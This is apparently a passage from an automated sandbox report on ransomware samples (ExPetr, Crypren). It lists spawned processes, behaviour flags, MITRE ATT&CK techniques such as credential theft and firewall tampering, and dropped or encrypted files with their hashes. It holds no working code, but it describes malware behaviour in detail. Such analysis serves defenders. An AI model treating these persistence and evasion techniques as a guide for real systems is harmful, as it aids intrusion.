                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:7156
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:7304
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:3860
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:7344
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:5156
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6388
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                            PID:3956
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\taskmgr.exe" /1
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                              PID:2556
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\efsui.exe
                                                                                                                                                                                                                                                                                                                                            efsui.exe /efs /keybackup
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:6876
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exe /d"C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe"
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              PID:3956
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Sets service image path in registry
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:6848
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 524
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4652 -ip 4652
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3956 -ip 3956
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6988
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6236 -ip 6236
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5472
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6236 -ip 6236
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6184
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4452
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5148
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4664 -ip 4664
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8116
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6236 -ip 6236
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7048
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5156
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5520
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:2868
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7164 -ip 7164
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5440
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:6856
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5796
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00439\!ENCRYPT_NOTICE.log
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3420

                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                              Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                              Resource Development

                                                                                                                                                                                                                                                                                                                                                                              Initial Access

                                                                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1059

                                                                                                                                                                                                                                                                                                                                                                              PowerShell

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1059.001

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                              System Services

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1569

                                                                                                                                                                                                                                                                                                                                                                              Service Execution

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1569.002

                                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                                                                                                                                              Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1546

                                                                                                                                                                                                                                                                                                                                                                              Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1546.007

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                                                                                                                                              Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1546

                                                                                                                                                                                                                                                                                                                                                                              Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1546.007

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                              Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1562

                                                                                                                                                                                                                                                                                                                                                                              Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1562.004

                                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                                              Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1553

                                                                                                                                                                                                                                                                                                                                                                              SIP and Trust Provider Hijacking

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1553.003

                                                                                                                                                                                                                                                                                                                                                                              System Binary Proxy Execution

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1218

                                                                                                                                                                                                                                                                                                                                                                              InstallUtil

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1218.004

                                                                                                                                                                                                                                                                                                                                                                              Regsvcs/Regasm

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1218.009

                                                                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                                                                              Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1555

                                                                                                                                                                                                                                                                                                                                                                              Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1555.003

                                                                                                                                                                                                                                                                                                                                                                              Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1552

                                                                                                                                                                                                                                                                                                                                                                              Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1552.001

                                                                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                                                                              System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1614

                                                                                                                                                                                                                                                                                                                                                                              System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1614.001

                                                                                                                                                                                                                                                                                                                                                                              System Network Configuration Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1016

                                                                                                                                                                                                                                                                                                                                                                              Internet Connection Discovery

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1016.001

                                                                                                                                                                                                                                                                                                                                                                              Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                                                                                              Exfiltration

                                                                                                                                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\7-Zip\7-zip.chm.exe
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                0c77b895bf1983b459064a798131b92b

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                9547d5ee82ace817c15a4531f2cb7981d543e01f

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                55d2cc611e381f91d623a52d1e757fb00e06cfe54a58e8cd2f0cd35232f995f6

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                72f9735bf767b594cccd6035b2c385fda404b674882d062981c79ba2d090ae963a325dadb07bfb187bb874b09bf403ffae43102e4c59f92a8e2141d776297b56

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt.encryptSIZE
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                8B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                c401dab7b38f2df21172a3db341ca7c1

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                335900c8365e67b6cd8f3032cababb5a2ba2cc31

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                74bffbe0ad126f7aad54241e0379cfee55ddf8f843f59d7b1fbf78f6c8814989

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                8c97776bab768b1de5f4b8709990122c575f12f60212f2555d1f2ff5d72851cae155f1e3174008b98678b019c6aab9d1a3e93be67ed680e5b0b283cda414aef1

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\root\vreg\powerpointmui.msi.16.en-us.vreg.dat.encryptSIZE
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                8B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                0785645805d37c959eb23225e361a3f1

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                09cfeaa1435333e701482d3ab92827c3c489a03d

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                b54b1a339e9f1b672af88b397362d05c99e30d790835dbfd74fc9117a6de76d3

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                fce46076a2ebf4f1dd43c9169564ab137e64d803680eb132814c71da9ede39632fb65a28543441cfceacdf2a80ab4a6ebcc4bce1c141ac874039e2470891a12c

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\root\vreg\proof.es-es.msi.16.es-es.vreg.dat.encryptSIZE
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                8B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                d650e3091f736b71ef51d0a532e2c29c

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                7e47b8e4d552470f6d8fd78693f09ea115da32be

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                41b8f24b79ae38bb5f3af44cf187d022c20517a6f576791e466d536517b68fb9

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                94339fc32c2e50271d2310aa04ed030688b3ad42b155276c736e1b791c22fca2f4e38dd540bd763c9e55a39c4579188e443f04f9787946145541aba6af260e46

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\root\vreg\proofing.msi.16.en-us.vreg.dat.encryptSIZE
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                8B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                261d34d6d9be414ea56b1000ea18ea4e

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                55e540c9eb925a82dcb8c2afaa65804c208472e7

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                46386ff0eccd7a7871daa3122b418bbf8e0d0180eca74808a53b2c3ed970f50e

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                a1acbc0867c61d804cb23ba36dd2705952d5a6636c06202514b0cff407a665881f297c21542489faa9c458d19bbf694d17de98bf9a9561a65f1ee5c8ff25a362

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Adobe\!ENCRYPT_NOTICE.log
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                3B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                918499f78f9473ace591bed8f8848227

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                7e0a88ec285d5910a64493d477e8cfddd303c8b0

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                840f8cebce5b0868f97dbb1984ea0efcb8fd96181ed539ce12509b3532eb90b6

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                73f4719e11adc15dc8abe7d6eea4acbf30799e58610db738290d7065640bac798438068f1c63c28391e3351e8f93fbfa26be0c0b723ba45173dace3f403e8001

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                4B

                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

